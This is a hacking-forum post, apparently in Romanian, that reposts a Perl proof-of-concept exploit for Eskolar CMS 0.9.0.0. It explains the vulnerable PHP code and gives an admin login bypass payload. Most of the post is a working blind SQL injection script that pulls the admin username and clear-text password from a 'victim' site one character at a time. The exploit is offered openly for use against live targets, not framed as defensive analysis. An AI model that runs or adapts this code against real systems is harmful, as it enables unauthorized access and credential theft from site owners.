Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
Naturesk pe Simpatie
Femeie
25 ani
Bucuresti
cauta Barbat
25 - 47 ani
Hacking and more... / Exploituri si POCs / Eskolar CMS 0.9.0.0 Remote Blind SQL Injection Exploit Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 18 ani
Postari: 1896


Code:

#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#==================================================================================================

#==============================================================================#

#        Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com                 #

#==============================================================================#

#==================================================================================================
#Title:       Eskolar CMS 0.9.0.0 Blind SQL Injection Exploit and bypass admin logon vulnerability
#Application: Eskolar CMS
#Version:     0.9.0.0
#Url:         http://sourceforge.net/projects/eskolar/
#==================================================================================================

#==================================================================================================
#Affected software description:

#Not properly sanitized input can be used to inject crafted SQL queries and cause
#the database server to generate an invalid SQL query. We can use Blind SQL Injection attack
#to determine username and password for CMS and also classical SQL Injection
#to bypass admin logon. Password for CMS is storing in database as clear text!
#There is using addslashes() function to filtration GET variables, but we can prepare
#SQL query without slashes in Blind attack. There is not addslashes() function to filtration
#variables using to log in, so we can use classical SQL Injection to log in as admin.

#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,
#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php

#==================================================================================================

#==================================================================================================
#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)

#if (isset ($_GET['gr_1_id'])) {
#    $gr_1_id = (get_magic_quotes_gpc()) ? $_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);
#}
#if (isset ($_GET['gr_2_id'])) {
#    $gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);
#}
#if (isset ($_GET['gr_3_id'])) {
#    $gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);
#}
#if (isset ($_GET['doc_id'])) {
#    $doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);
#}

#...

#index.php - line 202
#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";
#etc.

#...
#==================================================================================================

#==================================================================================================
#Bypass admin logon:

#Vulnerable code: (php/esa.php - lines 27-35)

#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];
#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];
#//$prefix="esa";
#$enter = 0;
#$_SESSION['uid'] = $uid;
#$_SESSION['pwd'] = $pwd;

#mysql_select_db($database_bkb, $bkb);
#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";

## If magic_quotes_gpc = Off attacker can log in as admin using classical SQL Injection attack.
## Eg: USER: j4ck' or 1=1/*
##     PSW:  *blank*

#===================================================================================================


#PoC Exploit:


if ((@ARGV lt 2) or (@ARGV gt 3))
  {
    &usage;
  }


sub usage()
{
  print "rn (c) Jacek Wlodarczyk (j4ck)rnrn";
  print "- Exploit for Eskolar CMS 0.9.0.0rnrn";
  print "- Usage: $0 <target> <target directory>rn";
  print "- <target>              -> Victim's target eg: http://www.victim.comrn";
  print "- <target directory>    -> Path to index.php  eg: /eskolar/rn";
  print "- Eg: http://127.0.0.1 /esa/rnrn";
  exit();
}


$HOST        = $ARGV[0];
$DIR         = $ARGV[1];
$prefixDB    = $ARGV[2];


if (@ARGV eq 2)
  {
    $prefixDB    = "esa";
  }



print "rnATTACKING : ".$HOST.$DIR."rnrn";
$HOST =~ s/(http://)//;


#$positive = "?doc_id=999%20or%201=1--";
#$negative = "?doc_id=999%20or%201=0--";


       @ARR = ("user","password");


print "Connecting ...rn";
sleep(1);

TOP:
for ($k=0;$k<=$#ARR;$k++)

  {

    $j=1;
    $i = 32;
    $string='';
    $res='';


    while()
      {
        $l=0;
        for ($i=32;$i<=127;$i++)
          {


            $val  = "?doc_id=99999";
            $val .= "/**/or/**/1=1";
            $val .= "/**/and/**/ascii(substring(";
            $val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)";
            $val .= ",$j,1))/**/=/**/$i";


            $data="$DIR$val";

            $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error - connection failed!rnrn";

            print $req "GET $data HTTP/1.1rn";
            print $req "Host: $HOSTrn";
            print $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4rn";
            print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5rn";
            print $req "Accept-Language: en-us;q=0.7,en;q=0.3rn";
            print $req "Accept-Encoding: gzip,deflatern";
            print $req "Keep-Alive: 300rn";
            print $req "Connection: Keep-Alivern";
            print $req "Cache-Control: no-cachern";
            print $req "Connection: closernrn";


            while ($ans = <$req>)
              {
                if ($ans =~ /404/ )
                  {
                    printf "nnFile not found.rnrn";
                    exit;
                  }


                if ($ans =~ /400/ )
                  {
                    printf "nnBad request.rnrn";
                    exit;
                  }


                if ($ans =~ /ORDER BY sorted ASC/)
                  {

                    $string .= chr($i);

                    if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2))
                      {
                        $res .= chr($i-1);
                        $l=1;
                      }
                    last;
                  }
              }

            if ($l eq 1)
              {
                print "Found: ".chr($i-1)."rn";
                sleep(1);
                last;
              }

            if ($i eq 127)
              {

                print "$ARR[$k] found: $resrn";
                $ARR[$k] = $res;

                if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne '')))
                  {
                    print "rnrnrn--------------------  Username => $ARR[0]";
                    print  " Password => $ARR[1]  -----------------------rn";
                  }

                elsif (($ARR[0] eq '') and ($ARR[1] eq ''))
                {
                  print "Nothing found ...";
                }


                if ($k eq 0)
                  {
                    sleep(1);
                    print "nTrying Passwordrn";
                    sleep(1);
                  }

                sleep(1);

                next TOP;

              }

            print "ttttTrying: ".chr($i)."rn";

          }

        $string = '';

        $j++;
      }

  }

#========================================================================================================



_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani
   
Pagini: 1  

Mergi la